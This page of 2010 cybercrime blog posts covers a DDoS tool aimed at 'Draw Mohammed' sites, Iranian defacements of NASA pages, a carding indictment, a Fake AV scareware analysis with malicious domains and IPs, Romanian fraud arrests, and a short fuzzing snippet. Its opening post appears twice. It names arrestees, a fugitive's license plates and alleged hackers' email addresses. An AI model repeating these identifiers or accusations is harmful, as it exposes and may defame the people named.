The current "Everybody Draw Mohammed Day" craze was not inspired by Westergaard, but rather by death threats against the SouthPark artists, Matt Stone and Trey Parker, who depicted the Prophet Mohammed wearing a bear suit. Seattle-based cartoonist Molly Norris ran a cartoon suggesting that May 20th, be declared "Everybody Draw Mohammed Day" sponsored by "Citizens Against Citizens Against Humor or CACAH", which she has now retracted by scribbling notes on her own cartoon:



Unfortunately for Molly, many folks took her seriously, creating a special website to receive their submitted drawings, and more relevantly to our topic today, they also created a Facebook group, "Everybody Draw Mohammed Day."




The creation of the Facebook Group lead to several national bans of Facebook, including bans by Pakistan, Bangladesh, and the United Arab Eremites. The UAE and Saudi Arabia both made "line item veto" bans blocking only the offending group on Facebook, while the first two banned the entire website. (Update: Pakistan lifted their "blanket" ban on May 31st after Facebook actually censored the offending group.)




Pakistani media reported that "hacking fraternities" were being formed to "take revenge" on the "blasphemous companies". Pakistani residents have reported receiving SMS text messages encouraging them to participate in DDOS attacks. The website "drawmohammed.com" has also been repeatedly defaced by Islamic hackers since this event began.

Perhaps the most outrageous response has been the encouragement to download the attack tool that is being spread to help people DDOS.

The Google Group "Muslims United" was created May 19th and has been actively attacking "offensive" websites. The main banner proclaims the site to be the "Anti-Draw-Muhammad (P.B.U.H.) -DAY", and currently has 1800 messages. Several of these relate to the "virtualjihad.net" website, where the DDOS tool is included.







VirtualJihad.net was registered on May 19th from the website "www.secsupport.com", a reseller for Directi's PublicDomainRegistry.com.

The website is hosted on the IP, 75.126.169.149, hosted by SoftLayer.com, right here in the USA.

The tool has a pull-down menu, allowing the user to choose whether he wants to attack "www.muhammadture.com", "www.drawmuhammadday.com", or "www.facebook.com".

Their website claims they have 34,306 people actively attacking with their tool at this time. The organizers, using the email "info@virtualjihad.net", claim to be reachable via MSN, GoogleTalk, or Skype as well as email.

VirtualJihad against Facebook

On May 20th, a group who claim to be motivated by various "Freedom of Expression" announced that they were holding "Everybody Draw Mohammad Day". As everyone knows by know, on September 30, 2005, a Danish newspaper chose to publish several cartoons of the Prophet Mohammed, including one of the prophet with his turban containing a bomb, which was drawn by Kurt Westergaard. This was the first many Westerners learned of the Islamic tradition that the prophet should never be depicted. The controversy has continued since then, with various papers reprinting the cartoons, and various Islamic nations then banning those papers, or calling for acts of violence against their editors. In January of 2010, Westergaard's home was broken into by an Islamic man who chopped through his door with an axe and desired to kill him with a knife.

The current "Everybody Draw Mohammed Day" craze was not inspired by Westergaard, but rather by death threats against the SouthPark artists, Matt Stone and Trey Parker, who depicted the Prophet Mohammed wearing a bear suit. Seattle-based cartoonist Molly Norris ran a cartoon suggesting that May 20th, be declared "Everybody Draw Mohammed Day" sponsored by "Citizens Against Citizens Against Humor or CACAH", which she has now retracted by scribbling notes on her own cartoon:



Unfortunately for Molly, many folks took her seriously, creating a special website to receive their submitted drawings, and more relevantly to our topic today, they also created a Facebook group, "Everybody Draw Mohammed Day."




The creation of the Facebook Group lead to several national bans of Facebook, including bans by Pakistan, Bangladesh, and the United Arab Eremites. The UAE and Saudi Arabia both made "line item veto" bans blocking only the offending group on Facebook, while the first two banned the entire website. (Update: Pakistan lifted their "blanket" ban on May 31st after Facebook actually censored the offending group.)




Pakistani media reported that "hacking fraternities" were being formed to "take revenge" on the "blasphemous companies". Pakistani residents have reported receiving SMS text messages encouraging them to participate in DDOS attacks. The website "drawmohammed.com" has also been repeatedly defaced by Islamic hackers since this event began.

Perhaps the most outrageous response has been the encouragement to download the attack tool that is being spread to help people DDOS.

The Google Group "Muslims United" was created May 19th and has been actively attacking "offensive" websites. The main banner proclaims the site to be the "Anti-Draw-Muhammad (P.B.U.H.) -DAY", and currently has 1800 messages. Several of these relate to the "virtualjihad.net" website, where the DDOS tool is included.







VirtualJihad.net was registered on May 19th from the website "www.secsupport.com", a reseller for Directi's PublicDomainRegistry.com.

The website is hosted on the IP, 75.126.169.149, hosted by SoftLayer.com, right here in the USA.

The tool has a pull-down menu, allowing the user to choose whether he wants to attack "www.muhammadture.com", "www.drawmuhammadday.com", or "www.facebook.com".

Their website claims they have 34,306 people actively attacking with their tool at this time. The organizers, using the email "info@virtualjihad.net", claim to be reachable via MSN, GoogleTalk, or Skype as well as email.

Sunday, April 25, 2010

Iranian "Sun-Army" attacks NASA and JDA

What does NASA, the US space agency, have in common with the Jerusalem Development Authority of the Israeli government? They've both been attacked this week by the new Iranian hacking group, "Sun-Army".

The Defacement authority, Zone-H.org reports that this group did their first reported hacks on February 17th, one more on February 27th, and then on February 23rd defaced:

maorm.larc.nasa.gov
pic.larc.nasa.gov
fabrication.larc.nasa.gov
ohcm.larc.nasa.gov
sw-eng.larc.nasa.gov
cmar.larc.nasa.gov
careertalk.larc.nasa.gov
oea.larc.nasa.gov
technologygateway.nasa.gov

www.zhemgang.gov.bt
www.jda.gov.il



Their earlier defacements accuse "traitors to the Islamic Republic of Iran" and quotes from the Quran - "Sura Araf verse 179"

That verse says, "And in the law of retaliation there is saving of life for you, O' people of understanding, so that you may guard yourselves against evil."

(These verse were teachings to prevent "tribal feuds" - prior to the Quran, when someone was killed, his family would seek vengeance by killing all of the murderers tribe that they could. This passage of the Quran teaches that retaliation should be one for one. The accused can seek limited vengeance, but once retaliation has been achieved, there should be no on-going feud. Lives are saved by limiting the retaliation.)

Here is their defacement of the Jerusalem Development Authority:



The current NASA defacement contained this English language text:

In The Name Of God

The Nasa organization which is funded by Usa and plays an important role not only in the most of scientific fields but also in many other projects like "Star Wars" which was aimed to weeken the former soviet union , now has come down to its knees toward
the scientific level of young iranians and iran , the birth place of Cyrus the great, who formed the biggest empire the world has ever seen.

the scientific apartaide which is imposed by Usa and it alies can never prevent us from progressing in international scene , special peaceful nuclear energy.

We Congratulate You On The Occasion Of Worlds Astronomical Day


The same message is repeated in Persian, with the following line added at the end:

که ایران و ایران زمین زنده باد /// سر افراز و جاوید و پاینده باد

I can't seem to translate that well with Google Translate it is rendered as:

Iran and the Iranian Live Earth / / / partition and the eternal and lasting head wind

(If you can provide a better translation, please let me know! gar at uab dot edu)



The more recent defacement points to the Sun-Army.com website, shown here:



The Sun-Army says on their website that they were created by inviting the leaders of many influential hacking groups to join forces under the new name to support Iran's security and the Quran. They claim the group was created on February 26, 2010.

Mehdy007 is a fairly regular visitor to the Iranian hacking site, Ashiyane Digital Security. One of his posts, from August 2009, shows him uploading links to a set of 55 hacking videos on a wide-range of hacking topics. On February 24th of this year he was sharing SQL Injection attack techniques with the group, one of which he demonstrated by hacking "sciencescotland.org"

Nitrojen26 also is a member at Ashiyane, and has in the past used the Yahoo email address "Nitrojen26@yahoo.com"

The.Mo3tafA, Nitrojen26, and BodyGuard all regularly show up on pages defaced under the name "Ashiyane Digital Security Team" along with Behrooz_Ice and Q7x, with this trademark logo:



MagicCoder is the relative newcomer to the group, though he has done some solo-hacking according to his Zone-H stats, and has his own logo as well:



He's a gmail user = magicc0d3r@gmail.com

PLUS is an unknown for me. Great hacker name, since its basically impossible to Google-search. He's been involved as a named party on a number of "team defacements" for Ashiyane, including ones that left this fairly recent tag:



On defacements that use that image, the message in Persian and English is:

Our belligerence is religious and does not own any borders, thus we are here as long as atheism and blasphemy exist. We do know that effrontery of blasphemy to Imam Khomeini is what that only you can do. This is just a warning to your governmental sites!


The list of members on those hacks is:
Behrooz_Ice -Q7x -Sha2ow -Virangar -Nitrojen26 -BodyGuard -tHe.Mo3tafA MagicCoder -0261 -Ali_Eagle -PLUS -Jok3r -System.Fehler
We Love Iran
Ashiyane Digital Security Team




The WHOIS registration information for Sun-Army.com lists the same email address as their defacements -- sun.army@asia.com -- as well as this address:

Sun Army
Sun Army (sun.army@asia.com)
Iranian Apartment. Azadi Sq. Tehran
Tehran
Zanjan,12365
IR
Tel. +009.2122532689

Domain servers in listed order:
ns4.mihanblog.com
ns3.mihanblog.com


The domain was registered by PublicDomainRegistry.com (DirectI Internet Solutions)

Those nameservers serve more than 700 other domains . . . mostly Iranian TLDs, ".ir"

Many of those domains are listed as attack pages, sucvh as "karrar.ir," which is described by Google SafeBrowsing as:

What happened when Google visited this site?

Of the 871 pages we tested on the site over the past 90 days, 37 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-04-25, and the last time suspicious content was found on this site was on 2010-04-22.

Malicious software includes 987 scripting exploit(s).

Malicious software is hosted on 4 domain(s), including link313m.persiangig.com/, link313m.blogfa.com/, bidel.ir.googlepages.com/.

2 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including link313m.blogfa.com/, boxeshia-sonni.mihanblog.com/.

This site was hosted on 1 network(s) including AS30176 (PRIORITYCOLO).


Following the links from that SafeBrowsing page find warning of malware, including malware being distributed via "sarzaminnews.mihanblog.com", "karrar.mihanblog.com", and "karrar.ir".

Saturday, April 24, 2010

Carders and Video Pirates?

This summary is not available. Please click here to view the post.

Tuesday, April 20, 2010

Dmitry Naskovets of CallService.biz, Meet the FBI

CallService.biz Gets a New Website


On April 19th a friend sent me a Facebook link announcing that CallService.biz had been closed. The news was officially announced by the New York FBI on Monday, although the arrests happened on April 15th.

The website, even as of this writing, displays a new homepage that looks something like this:



When the FBI designed to take over the management of the CallService.biz website, they did a little relocation first. For some reason they didn't want to host it in Moscow, I guess. The old location, 212.158.162.5, is the home of such great websites as:

1001russian-bride.com, a fine site for buying your new Russian wife (you can talk to her first for only $5.99 per minute...)

and

AdmiralSlots.com, a Casino that I'm assured by all of my spam is a great place to play. They have a wonderful affiliate program which will pay you 20% of the deposits your customers sign up. Errr... "Привлекая новых клиентов в наше казино, вы будете получать 20% от всех их депозитов, независимо от выигрыша." Thankfully, they NEVER send spam. "Запрещена реклама с помощью спама и методами, противоречащими действующему законодательству и нормам морали." See?

Tracking the various organizations that have hosted this criminal website sends us through such dark corners of the Internet as Net Access Corporation (NAC) in New Jersey (66.246.206.121), Garant Park Telecom (89.111.176.54) at Moscow State University, and Caravan.ru (212.158.162.5) also in Moscow.

CardingWorld.cc, also mentioned in the Indictment, is hosted at RusTelecom.biz and was registered using a clever gmail account - cardingw@gmail.com, although originally the owner used the more discrete email - cardingworld_cw@yahoo.com or cwivanov@googlemail.com.

The Indictment



The Indictment (thanks to ThreatLevel@Wired for providing a copy...saves me a couple bucks on my PACER account), says that Dmitry M. Naskovets (Дмитрий Насковец) resided in the Czech Republic and the Republic of Belarus and that he operated the online business CallService.biz with his co-conspirator, Sergey A. Semashko (Сергей Семашко), and that such business was "an online enterprise designed to help identity thieves profit from stolen financial data."

(Dmitry was arrested in the Czech Republic on April 15th. Sergey was arrested in Belarus the same day, while Lithuanian police seized the cardingworld.cc website related to the case, which was housed at 193.219.5.196, IP space belonging to Elneta, elnet.lt.)

From at least June 2007 up to and including April 2010, Naskovets and Semashko operated CallService.biz. Part of their service was to recruit English and German speakers to pose as authorized account holders in order to conduct or confirm fraudulent transactions on behalf of CallService.biz customers. The website allowed Russian speaking customers to place orders for these services. From the indictment:

Orders consisted of, for example, the name of the bank the user wanted to contact, the stolen account information that the user had illegally obtained, and instructions from the user as to what to say, or the fraudulent transaction that was to be conducted, during a phone call to the bank. NASKOVETS and his co-conspirators would assign an appropriate individual, including one who was the same gender and spoke the same language as the authorized account holder. After the requested call was made, NASKOVETS and his co-conspirators would report the results to the CallService.biz user, who could issue instructions for further telephone calls, if necessary.


The indictment quotes from an advertisement that Semashko placed on another website to advertise their service. That website, CardingWorld.cc, was owned and operated by Semashko. The advertisement claimed that CallService.biz had 'over 2090 people working with it' and had done 'over 5400 confirmation calls' to banks, meaning calls to confirm or conduct fraudulent transactions, as described above."

Charges placed against Naskovets and Semashko include:

Title 18 Section 1343, accusing them of "unlawfully, willfully, and knowingly, having devised and intending to devise a scheme and artifice to defraud, and for obtaining money and property by means of false and fraudulent pretenses, representations, and promises, [that] would and did transmit and cause to be transmitted by means of wire, radio, and television communication in interstate and foreign commerce, writings, signs, signals, pictures, and sounds for the purpose of executing such scheme and artifice."

The charges are supported by Instant Message logs which talk about registering the domain name, and wiring fees as much as $35,000 between the two. Other messages contained details of online purchases, including the victim's name, address, email address, Social Security number, answers to security questions related to their banking account, and other information.

Other charges included violations of:

Title 18 USC Sections 1029(a)(2) (obtaining a thing of value greater than $1000 through use of one or more unauthorized access devices during a one-year period)

Title 18 USC 1029(a)(3) (possessing fifteen or more counterfeit or unauthorized access devices)

Title 18 USC 1029(a)(5) (receiving payment exceeding $1000 in interstate and foreign commerce via access devices issued to another person)

Title 18 USC 1028A(c), 1028A(a)(1) and (2) - possession of credit card numbers and bank account numbers (access devices) belonging to other people and transferring them to co-conspirators who used them to facilitate fraudulent transactions.


The Reaction in the Russian Underground



The reaction to this news has been pretty swift. In the carding forum, http://forum.xakepok.org/, one of the moderators, "Maestro", posted a Russian translation of the FBI press release and warned people that the logs from the Callservice.biz site were in the possession of the FBI and that people should immediately discontinue use of any emails or ICQ programs that they had used on that server.

Over on Web-Hack.ru the criminals are warning one another to be careful ("Будьте осторожны - берегите себя!") , and to keep an eye on this situation - especially if the US manages to extradite the criminal! One of the posters mentions that the press release says the criminal could face 39 1/2 years in prison, but then jokes, "of course he'll get off in 3 years."

The moderators at CarderNews.ru start off their very lengthy column by saying "this is not a news story to read quickly and shake your head and forget...this is an information bomb!" The moderator goes on to say, "first, don't panic. Nobody is going to use the information on these servers to start busing petty thieves", but then he goes on and reminds people that even petty thieves should be using SSL and VPN for their internet traffic. He concludes with "do not panic, and do not forget about your safety" (не поддавайтесь панике и не забывайте о своей безопасности.)

CarderNews then does an interview with "Cesar" a moderator who says he worked on the "technical administration" side of the CardingWorld server. Nothing too informative in the interview. It was clear Cesar was limiting what he was going to say.

Thursday, April 15, 2010

Fake AV In the News

Last week I had the opportunity to speak to the IT-360 conference in Toronto, Canada. One of the points that I made in my talk was that we need to respond differently to malware. Rather than just deleting the malware, those who are able should spend a bit of additional time to gather intelligence and share that intelligence with the public and law enforcement. Brian Jackson from ITBusiness Canada took that message to heart, and contacted our lab this week to ask what we could tell him about a curious Google search that he performed.

Brian was looking for more information on the plane involved in the recent death of the President of Poland, a plane known as a "TU-154" called a "Careless" by NATO. When he did his Google search:

TU-154 Careless

nine of the top ten hits he got back were links to pages containing malware. He tells his own version of the story in his article Hackers exploit Polish President's death with scareware attack. Now, even three days later, several of the top Google results still are pointing to malware sites, including:

haroldmedia.com.au
insidekbm.com
innerproductsgroup.com

We passed Brian's request for research to our Malware Analysis group, led by UAB Computer & Information Sciences Masters student, Brian Tanner, who was able to give a quick response to the request - having a strong understanding of what was going on in the first thirty minutes, including identifying a high school website in North Alabama that had been compromised to help distribute the malware! Others joined Brian in the analysis to provide more details.

These sites are running extreme SEO malware - Search Engine Optimization pages which function by building "news headline" sites designed to achieve top Google ranks. For instance, Google is currently indexing 741 unique news headlines pointing off the InnerProductsGroup website, most are current news headlines or "hot searches" such as:

mine rescue teams
mine rescue chambers
frank lucas wife
new york times crossword answers
mega piranha trailer
nbc news brian williams
kristen stewart budapest
tupolev 154 cockpit
the katyn massacre movie
national katyn massacre movie
smolensk airport
jack johnson tour dates usa 2010
spartacus episode 12
Remax.com Homes For Sale Houston

Here's an example from that list - a search for "Kristen Stewart Budapest" shows three malware pages in the top ten results on Google, in positions #4, #7, and #9 for me, but only one of the three is currently properly labeled as "This Site May Harm Your Computer"



What happens if you visit one of these sites? It launches a malware installation of a part that we call "Fake AV" malware. Let me start by showing you what one of these LOOKS like:



Clicking OK results in a web page that appears to be doing a Virus Scan.



The AV, which was really a web page, then says it needs to be updated, and offers an update for you to install.


Running that one actually does install the Fake AV product.




After installing the Fake AV, many imaginary viruses on your computer are "detected", and you are asked if you would like to "Remove All".



Choosing "Remove All" prompts you for credit card information, offering several purchase plans ranging from $49.95 to $89.95 for a "lifetime" Fake AV product.




If you decide not to complete the transaction, you will be bugged relentlessly with pop-ups like these.




Reporting ScareWare



Sounds scary, doesn't it? The industry calls this type of malware "Scareware". Its going to keep trying to make you believe that the only way to keep your machine safe is to give the criminal your credit card information.

Last June, the US Government's Federal Trade Commission fined one of these Scareware vendors $1.9 Million for selling more than 1 million copies of his fake anti-virus software! That's proof that people really do get victimized by this software! I experienced some of James Reno and Innovative Marketing's software first hand when I visited a hotel in San Diego last year. The Business Office computers were all "protected" with one of their fake anti-virus software packages.

There's big money in Fake AV, which is why the current gang continues so diligently even after seeing one of their fellows fined $1.9 Million!

If you've been scammed by these criminals, be sure to file a complaint! I recommend complaining to the FBI's Internet Crime & Complaint Center (ic3.gov). Because of the FTC's previous involvement with Fake AV, you might also want to file your complaint there using their FTC Complaint Assistant.

While neither of these complaint forms is ideally suited for dealing with a Fake AV product, both do offer the opportunity to enter a free-form complaint towards the end of the process. Put as much descriptive detail as you can there.

(Watch FTC Video ScamWatch: How To File A Complaint.)

How does it work?



The sites that have been SEO optimized to show up in news headline and other popular searches act as redirectors. If you type the URL in directly, it forwards you to CNN.com. If you are REFERRED to the URL from Google, Yahoo, or Bing, you are redirected instead to the fake "scanner" page. That page will vary widely, but it started in our case above with a redirect to:

www.bestsafety9.xorg.pl

That first copy of the malware it installed, "packupdate_build8_195_2.exe" was only lightly detected. In a VirusTotal Report on this malware, only 8 out of 40 anti-virus products detected this software as malicious. Major products including ClamAV, F-Prot, Kaspersky, McAfee, Sophos, and Symantec did not report this software as malware.

We let the software run in the lab for a bit to see what computers it would connect to. Here's a partial list:

myfairland.com (91.207.192.24) - Sam Tam, UK
paymentsafety.net (94.102.63.61) - Ecatel, NL (nameserver = 64.86.16.19)
report.land-protection.com (91.207.192.24) - Sam Tam, UK
update1.winsystemupdates.com (188.124.7.156) - Vital Teknoloji, TR
report1.stat-mx.xorg.pl (109.196.132.41) - Vline, Ltd, Moscow
update2.winsystemupdates.com (93.186.124.92) Vital Teknoloji, TR
secure1.safepayzone.xorg.pl (188.124.7.158) Vital Teknoloji, TR
virtest.com (95.169.186.3) - Keyweb, RU - ICQ: 570352881 / virtest@gmail.com
invoiceerica.com (213.229.83.84) - ?? Bluesquare House, Berkshire, UK?
webpaybill.net (66.197.156.53) - NOC, Inc, Scranton, Pennsylvania
system-defender2010.com (91.212.226.199) - Artem Zhirkov, Russia
update1.savecompnow.com (188.124.7.158) Vital Teknoloji, TR

"virtest.com" is a service similar to Virus Total, only this one is clearly run to help criminals determine if there malware is detected or not. VirusTotal, run by white hat security researchers in Spain, shares details of submitted viruses with all participating anti-virus companies. VirTest is almost the opposite. As our friends at Damballa pointed out recently, VirTest charges money to scan your submitted malware and pledges anonymity and that your submissions will NEVER be shared with anti-virus vendors. Our infected computer constantly checked VirTest to see whether it was detected or not. After a while, the malware replaced itself with some new code that we found running from the location:

C:\Documents and Settings\All Users\Application Data\ea73a34\CUea73.exe /s /i /uid=195 /ls=6

That copy of the malware was only detected by 5 of 39 anti-virus products, according to this VirusTotal Report.

After this software ran, we noticed changes in our HOSTS file. All Google sites, for many different country codes, as well as Bing and Yahoo! search pages were being redirected via the HOSTS file to point to 209.212.147.138. That's on the Coloquest network in Arlington Heights, Illinois.

Many of the domains we linked to were hosted on common IP addresses with other domains, such as:

softdialogonline.com
windowspc-defender.com
online-systemscanner.com
system-updates.net

Several of those domains are registered to "Garritt Kooken" with Netherlands email address gkook@checkjemail.nl, who strangely uses the Chinese telephone number +86.592257788 despite having a street address in India.

Mr. Kooken really likes to make fake AV product websites, and hosts many of them on Ecatel in the Netherlands, such as:

best-pc-defender.net
cleanupantivirus.com (94.102.63.64)
cleanviron-mypc.net
dopc-checkprotect.in
exodus130.com
fast-guardcleaneronpc.net
fastscanandcleansoft.com
fastzone-guard.com
holduponyourpc.com
hotcleanof-yourpc.net
lastcheckonmy-zone.net
new-system-defender.net
on-guardzone.com
paymentsafety.net (94.102.63.61)
pcliveguard.com (94.102.63.65)
pcregrtuy.com
safeantivirus.net
safetypcprotection.net
save-secure.com
search4vir.net
securityantivirus.net (94.102.63.67)
seekviron-mypc.net
systemmdefender.com  (94.102.63.61)
systemmguard.com
systemonlinepayment.com
thebestcleanofpc.net
windowsadditionalguard.net
winguard-pro.com
xmopolit67re.com
your-securepayment.com   (94.102.63.61)
your-staffdefender.com
yourzone-best-defender.com

Looking at some IP Neighbors for computers our infected lab machine connected to, we find:

Looking at some "IP Neighbors":

Ecatel of the Netherlands (AS29073)
-----------------------------------
safety-payment.net - 94.102.63.62
safetypayment.net - 94.102.63.62
secures-guard.com - 94.102.63.64
systemmguard.com - 94.102.63.64
cleanupantivirus.com - 94.102.63.64
windowspc-defender.com 94.102.63.65
windowsguard-pro.com - 94.102.63.68
safeantivirus.net = 94.102.63.69
paymentsecurity.net = 94.102.63.69
secure.greywall.net = 94.102.63.69

on Vital Teknoloji in Turkey (AS44565)
------------------------------
update1.winsystemupdate.xorg.pl - 188.124.7.155
securemyfield.com - 188.124.7.156
newsystem-guard.com - 188.124.7.156
update1.winsystemupdates.com - 188.124.7.156
savecompnow.com - 188.124.7.156
newsystem-guard.net - 188.124.7.156
secure1.safetypayment.xorg.pl - 188.124.7.158
newsystemshield.net - 188.124.7.158

on Vline Ltd in Moscow (AS39150)
-----------------------------
www3.tr-leech-kl.xorg.pl - 109.196.132.41
update2.sysupdate-n2.xorg.pl - 109.196.132.41
update2.sysupdt-n2.xorg.pl - 109.196.132.41
report1.stat-mx.xorgl.pl - 109.196.132.41
www1.free-scan-offer-nl.xorg.pl - 109.196.132.40
update1.sysupdate-n3.xorg.pl - 109.196.132.40
www1.best-free-scan-deal-k24.xorg.pl - 109.196.132.40
www1.best-free-scan-deal-nihob.xorg.pl - 109.196.132.40

Unfortunately this is just a drop in the bucket. This bad guy has 1800 domain names to his registration.

Our friend Dancho Danchev mentioned gkook in his series A Diverse Portfolio of Fake Security Software back in December.

A search at the excellent MalwareURL.com shows that this email address has been associated with this type of malware since at least October 9th, when "windows-pcdefender.com" was being reported.

Kimberly at Stop Malvertising did an excellent write-up showing this criminal poisoning searches for St Patrick's Day Celebrations.

She also reported back on December 1, 2009, that Tiger Woods SEO poisoning was leading to Fake AV products in this same group.

Monday, April 12, 2010

Nicolae Popescu, Romanian hacker, at large!

Last week we congratulated DIICOT and their FBI partners on the successful arrest of 70 Romanian Internet fraudsters from three large cybercrime rings. This story continues to develop with more facts being shared as the legal proceedings move forward - but the most significant development is that one of the ring leaders is missing!

While 34 fraudsters are being held in Râmnicu Vâlcea for 29 days while the prosecution builds their cases against them, the most signficant news is one of the individuals NOT being held!


(source: Stirile Pro TV)

One of the ringleaders of the group captured last week, Nicolae Popescu, 'released himself' from custody and is now at large. Apparently when the initial arrests were made, the legal documents under which they were being held were set to expire at 1830 on the day of their arrest. The DIICOT prosecutors were working madly to make their claims to hold each of those arrested for 29 days further investigative period, as is typical in Romanian law, but when 6:30 PM came and went and no papers had been served against Nicolae, he asked to be released, and legally, there was nothing that could be done to stop him! Apparently he quietly walked out the front door without anyone notifying the DIICOT staff what was going on.

I read about this in Impact Real, but many other Romanian news sources are covering the story. No one knows where he is at this time. If you've got more info, please send it this way!

If you live in Romania, you are being asked to report any contact or sighting of Nicolae to the emergency police number. People are also being asked to look out for his vehicles. 30-year-old Nicolae is from Alexandria, Alexandria, Teleorman, Romania. He owns a white Mercedes Benz ML with the license plate "B-63-JOC" (B63"Play" in Romanian), a Black Mercedes Benz CLS 350 with the license plate "B-42-JOC", and a black Audi A6 with the license plate "B-80-BJI".

The Internet Scammers Blog has quoted Romanian Masura Media who is covering the case. Masura says that thirty-four hackers arrested in Valcea will be held for 29 days while further investigation is underway. Their names:

Florin Dan Mişcoci, Alexandru Răduţ, Marius Adrian Ologu, Marian Sorin Grigorie, Laurenţiu Dumitru Anghel, Vasile Petronel Avram, Florin Buceag, Iulian Stere, David Gabriel Cârstea, Narcis Nicolae Petrache, Sebastian Lungu, Bogdan Mehedinţu, Daniel Alexandru Ciomag, Aurel Cătălin Dincă, Gheorghe Tiberiu Budărescu, Ionuţ Sorin Dumitru, Gabriel Drăghici, Nicolae Cristian Ciucă, Nicolae Popescu, Dumitru Daniel Busogioiu, Ovidiu Vlad Cristea, Ştefan Iordachi, Florin Nicula, Nicolae Andrei Paraschiva, Cătălin Sârbu, Marian Lovită Priboi, Mihaela Florina Ungureanu, Vlad Nicolae Vrapciu, Flore Valentin Boje, Alin Constantin Cotă, Florin Dorin Răducu, Călin Cornel Fălcuşan, Alexandru Nicolăescu, Claudiu Marian Turica.

Googling almost any of those names will find many more stories in Romanian. . .

Impact Real also lists the items seized during the raids on this group:

77,350 euros, 49,000 U.S. dollars, 64,860 pounds, 60,645 lei, a luxury watch, a rifle, three pistols and 150 grams of gold. 70 laptops, 165 mobile phones, 35 desktop computers, 15 modems, new servers, 10 blank cards, 2425 SIM cards, 40 cards, 325 memory sticks , 1040 CD-DVD, 20 hard disks, 30 disks and six video cameras. As well as seven cars, worth over 300,000 euros.

Hmmm... what would bad guys be doing with 2,425 SIM cards? Very interesting!

Tuesday, April 06, 2010

70 Romanian Phishers & Fraudsters Arrested

On March 4th, FBI Director Robert Mueller was given a speech on Cybercrime to the RSA conference where he mentioned that:
And we have worked with the Romanian National Police to arrest more than 100 Romanian nationals in the past 18 months. Four years ago, several American companies threatened to cut cyber ties with Romania because of the rampant hacking originating from that country. And yet today, Romania is one of our strongest partners.


Hotnews.ro followed this up with a 7 minute interview from March 9, 2010 with FBI Legal Attache Gary Dickson who is the liaison between the FBI and Romanian cyber police. He states in the interview that Romanian cyber criminals steal "hundreds of millions of dollars" from Americans each year.


(click to play interview in YouTube)

When asked what the main type of crime was that Romanians committed against Americans, Dickson said it was primarily Auction fraud - where they sold imaginary goods to Americans.

There is good news on that front today from Romania!

On Tuesday, April 6, 2010, the Romanian Police released the news of a police raid organized by the prosecutors at D.I.I.C.O.T. - the Directorate for Investigating Organized Crime and Terrorism - had arrested 70 members of three separate organized cyber crime groups.

DIICOT Press Release

Since 2006 these groups have stolen funds from citizens of Spain, Italy, France, New Zealand, Denmark, Sweden, Germany, Austria, the United States, Canada, and Switzerland - primarily through online auction fraud. International authorities have identified more than 800 victims with more than 800,000 Euros worth of losses.

300 gendarmes and 400 policemen, including 260 members of the Special Investigations Brigade of the Gendarme participated in the arrests, which included 101 search warrants being served. 31 in Bucharest, 41 in Valcea, 12 in Teleorman, 4 in River, and one each in Arges, Prahova, Brasov, Constanta, Doj Giurgiu, Suceava, Botosani, Bacau.

DIICOT says that the raids were conducted in collaboration with the FBI and US Secret Service officers from the US Embassy in Bucharest.

A video of one of their raids was posted as an MP4 file -- here's a few stills from that video:





The story is starting to hit the wires with April 7th bylines - follow along in Romanian if you wish:

The story FBI Descends on Prahova indicates searches were also conducted related to this case in Prague and in the USA.

According to the Gazeta de Sud the raid was codenamed "Operation: Valley of the Kings" (Valea Regilor).

Gandul News has a photograph I haven't seen elsewhere, and reports that the criminals were selling fictional electronic and luxury cars and even airplanes. Recent sales included a BMW X5, Lexus and Infiniti vehicles, and even a recreational aircraft that sold for 67,000 Euros to a rich American. The group also sold motorcycles, laptops, and gold and platinum Rolex watches -- all fakes. Officers monitored the three groups for a year before pulling the trigger on the raid.

Realitatea got a statement from DIICOT executive, Nicolae Blaga - "Computer fraud and the sale of information stolen by phishing are well-known practices" or something like that -- (Modul de fraudă informatică este arhicunoscut cu procurarea datelor prin fishing, inducerea în eroare a părţilor vătămate prin licitaţii frauduloase.)

Nicolae's statement to the Adevarul.ro included the statement that "the support he received from the FBI was of great importance." (Am beneficiat de spijinul FBI care a fost de mare importanţă")

Agentia is the only story so far that specifically mentions fake eBay sites being involved. It is likely that the account take-overs that allowed the convincing sale of vehicles began with an eBay phishing campaign to steal credentials.

According to this story in Brasov one particular student, pays his way through college by selling imaginary yachts and villas on the Internet. He received his wake-up call from the Organized Crime Brigade in his dorm room at the University of Transylvania.

Thursday, April 01, 2010

PWN2OWN & Fuzzing

Charlie Miller got quite a bit of buzz for his fuzz when at CanSecWest he owned a fully patched Mac with fully patched Safari "in 10 seconds". He got more attention when he announced that he wasn't going to release his discovered vulnerabilities, but rather provide a detailed methodology that would allow the vendors to find all the bugs that he had found, plus more. Forbes Magazine shares that much of Charlie's skills was acquired while working for five years at the NSA as a "global network exploitation analyst". What a cool title!

While I have some head knowledge about fuzzing - having read and played with the book Fuzzing: Brute Force Vulnerability Discovery, what really made me understand its value was working a Penetration Testing engagement with Packet Ninja Daniel Clemens. Dan does most of his work at a hand-crafted "ninja intuition" level, but when he has discovered a potentially vulnerable app, he's absolutely willing to throw a fuzzer at it and let it churn. In this case, I got to watch him in action with Burp Intruder.

I knew that Dragos, another famous fuzzer, listed Burp Intruder as one of his Ten Favorite Web Application Fuzzing Tools. But watching this tool in the hands of a master Pen-Tester like Dan really made the lights come on for me!

Still, its one thing to fuzz forms on a website, and quite another to fuzz applications (although Dan does that quite successfully, too). When I heard about Charlie's "three-peat", winning PWN2OWN for the third consecutive year, I started hitting all the blogs looking for first hand accounts from people who were there. One of the most amazing things to me was that Charlie claimed to have found all of these vulnerabilities using "a dumb 5-lines of python fuzzer". I got some hints that things were more complicated than that by looking at some slide-shots from CanSecWest 2010 In Pictures, including scary ones like this:


and

(pics from "infosecevents.net")

Charlie's talk demonstrated his results using his fuzzing technique on PDF files using Adobe Acrobat Reader and Mac PDF Preview and on PowerPoint files, using Open Office PPT, Microsoft Office PPT. From his previously discussed work in Safari and IE we know that his techniques have much broader implications.

Today I finally got a much deeper understanding when I saw from the Thoughts from a Technocrat blog that Charlie had posted his CanSecWest slides from his presentation -- Babysitting an army of monkeys: an analysis of fuzzing 4 products with 5 lines of Python (PPT file).

His presentation contains this hint at the Five Lines of Python you've been breathlessly waiting for:

numwrites=random.randrange(math.ceil((float(len(buf)) / FuzzFactor)))+1for j in range(numwrites):rbyte = random.randrange(256)rn = random.randrange(len(buf))buf[rn] = "%c"%(rbyte);


